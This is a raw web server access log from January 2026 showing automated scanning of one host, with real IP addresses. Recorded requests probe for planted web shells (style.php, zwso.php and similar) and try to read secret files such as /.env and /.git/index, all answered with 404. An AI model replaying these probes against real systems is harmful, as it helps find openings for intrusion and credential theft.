"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:04:49:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/style.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/style.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/style.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/style.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/style.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/chosen.php?p=" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/gifclass.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/class-t.api.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/blurbs.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/akcc.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/shelp.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/cord.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/dex.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/admin-ajax.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/file2.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:43 +0000] 404 - GET http profibot.direct.quickconnect.to "//zwso.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/zwso.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_mna.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/bolt.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/shlo.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/133.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/ahax.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/php8.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/lufix1.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/witmm.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/index.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/index.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/index.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/files.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-editor.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/txets.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/txets.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/txets.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/postnews.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/postnews.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:49:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/postnews.php" [Client 104.28.214.112] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:05:00:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:05:09:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[14/Jan/2026:05:15:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.79.181.104] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:05:15:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.79.181.104] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:05:17:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:05:22:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 79.129.41.84] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:05:26:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:05:33:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 62.152.51.110] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[14/Jan/2026:05:37:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 162.142.125.220] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:05:37:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.220] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:05:37:34 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:05:37:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.220] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:05:37:39 +0000] 404 - GET http 92.249.249.197 "/.well-known/security.txt" [Client 162.142.125.220] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:05:37:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.220] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:05:47:56 +0000] 404 - GET http 92.249.249.197 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[14/Jan/2026:05:49:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:05:50:58 +0000] 404 - GET http 92.249.249.197 "/druid/index.html" [Client 128.203.204.32] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[14/Jan/2026:05:53:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.100.11.243] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[14/Jan/2026:05:57:29 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:05:57:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 89.42.231.186] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[14/Jan/2026:06:00:26 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:06:08:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 34.38.45.85] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[14/Jan/2026:06:10:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:06:11:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 3.130.96.91] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[14/Jan/2026:06:13:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:06:15:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 3.130.96.91] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[14/Jan/2026:06:16:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 0] [Gzip -] "-" "-" +[14/Jan/2026:06:17:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:06:19:47 +0000] 404 - GET http 92.249.249.197 "/robots.txt" [Client 91.232.238.106] [Length 150] [Gzip -] "xfa1" "-" +[14/Jan/2026:06:20:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:06:21:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:06:31:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 172.236.228.197] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[14/Jan/2026:06:39:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:06:54:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 178.176.28.233] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[14/Jan/2026:06:58:21 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[14/Jan/2026:06:58:22 +0000] 404 - GET http 92.249.249.197 "/env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[14/Jan/2026:06:58:23 +0000] 404 - GET http 92.249.249.197 "/public/.env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[14/Jan/2026:06:58:24 +0000] 404 - GET http 92.249.249.197 "/public/env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[14/Jan/2026:06:58:25 +0000] 404 - GET http 92.249.249.197 "/app/.env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[14/Jan/2026:07:05:05 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:07:06:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:07:07:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:07:12:54 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.194] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:07:12:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.194] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:07:31:24 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:07:31:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:07:45:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 91.230.168.238] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:07:45:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 91.230.168.235] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[14/Jan/2026:07:46:02 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[14/Jan/2026:07:48:20 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:07:55:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:08:00:40 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:08:07:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:08:12:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 35.203.211.253] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[14/Jan/2026:08:19:15 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:08:41:52 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.165] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[14/Jan/2026:08:43:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:08:50:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:08:55:29 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:09:02:46 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[14/Jan/2026:09:10:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:09:10:52 +0000] 404 - GET http 92.249.249.197 "/.git/index" [Client 77.83.39.162] [Length 122] [Gzip 1.35] "Mozilla/5.0 (PLAYSTATION 3; 2.00)" "-" +[14/Jan/2026:09:36:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:09:37:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[14/Jan/2026:09:37:15 +0000] 404 - GET http 92.249.249.197 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[14/Jan/2026:09:45:51 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 9; ONEPLUS A6003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36" "-" +[14/Jan/2026:09:49:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:09:59:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:10:24:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 101.91.110.14] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:10:24:33 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 101.91.110.25] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[14/Jan/2026:10:24:54 +0000] 400 - GET http profibot.direct.quickconnect.to "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:10:24:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/robots.txt" [Client 101.91.110.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[14/Jan/2026:10:24:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/sitemap.xml" [Client 101.91.110.141] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[14/Jan/2026:10:25:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/config.json" [Client 101.91.110.162] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[14/Jan/2026:10:26:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:10:29:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:10:36:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:10:37:24 +0000] 200 - GET http 92.249.249.197 "/" [Client 196.251.100.189] [Length 1033] [Gzip -] "Hello World" "-" +[14/Jan/2026:10:48:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 34.78.140.118] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[14/Jan/2026:10:48:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:10:50:44 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:11:05:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 141.98.11.171] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[14/Jan/2026:11:15:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:11:30:47 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:11:36:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[14/Jan/2026:11:38:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 196.251.100.189] [Length 1033] [Gzip -] "Hello World" "-" +[14/Jan/2026:11:41:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:11:46:18 +0000] 200 - GET http 92.249.249.197 "/" [Client 130.12.180.2] [Length 1033] [Gzip -] "Hello World" "-" +[14/Jan/2026:11:46:46 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[14/Jan/2026:11:48:42 +0000] 404 - GET http 92.249.249.197 "/.git/refs/" [Client 185.241.208.170] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Android 6.0.1; Mobile; rv:48.0) Gecko/48.0 Firefox/48.0" "-" +[14/Jan/2026:11:55:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" 